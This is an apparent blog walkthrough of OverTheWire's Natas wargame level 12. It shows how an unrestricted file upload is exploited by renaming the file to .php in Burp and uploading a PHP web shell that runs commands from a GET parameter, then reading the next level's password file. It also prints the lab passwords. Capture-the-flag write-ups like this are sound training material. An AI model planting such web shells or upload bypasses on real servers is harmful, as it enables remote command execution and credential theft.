Natas · OverTheWire

Natas Level 12 → Level 13

Level 12

Username : natas12
Password : EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3
URL : http://natas12.natas.labs.overthewire.org

Solution

To solve this level, we first log into the natas12 application using the credentials provided above.
As we can see, the application allows a user to upload JPEG files to the server with a maximum size of 1KB. I uploaded the following image: Orange-sun-small-min.jpg to the server and the server responds back with the location of the file.

Upon inspection of the source code and checking Burp logs, we can see that the application changes the filename to some random characters and sends it in a POST request to the server to upload the file.

6-26-2017 3-28-53 PM.png

The file is uploaded at a random path using the function makeRandomPath($dir, $ext). The application does not perform any checks on the filetype of the file and merely stores it in a random directory. Therefore, it seems like the application is vulnerable to ‘ Unrestricted File Upload ‘. Let’s create a new php file and inject some code into it.

<?php
$output = shell_exec('ls -lart');
echo "<pre>$output</pre>";
?>

The application changes the extension of the file to a jpg. To bypass this, we can intercept the request in Burp and change the filename to php. This would keep the extension intact while the file is uploaded on the server.

6-26-2017 3-53-03 PM.png

After uploading, we can see that the application responds with a list of files and folder found in the upload folder as intended.

6-26-2017 3-50-06 PM.png

Let’s modify the shellcode to take input from the user. We can then ask the file to print content of /etc/natas_webpass/natas13.

<?php
$output = shell_exec($_GET["cmd"]);
echo "<pre>$output</pre>";
?>

The above shellcode would take a command from the GET variable cmd and print the output back to us. Let’s run the following command: ‘ http://natas12.natas.labs.overthewire.org/upload/pgfs4n9g3p.php?cmd=cat%20/etc/natas_webpass/natas13 ‘, replace pgfs4n9g3p.php with the randomized filename generated by the application and Voila! the application responds with the password for the next level.

Level 13

Username : natas13
Password : jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY
URL : http://natas13.natas.labs.overthewire.org

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s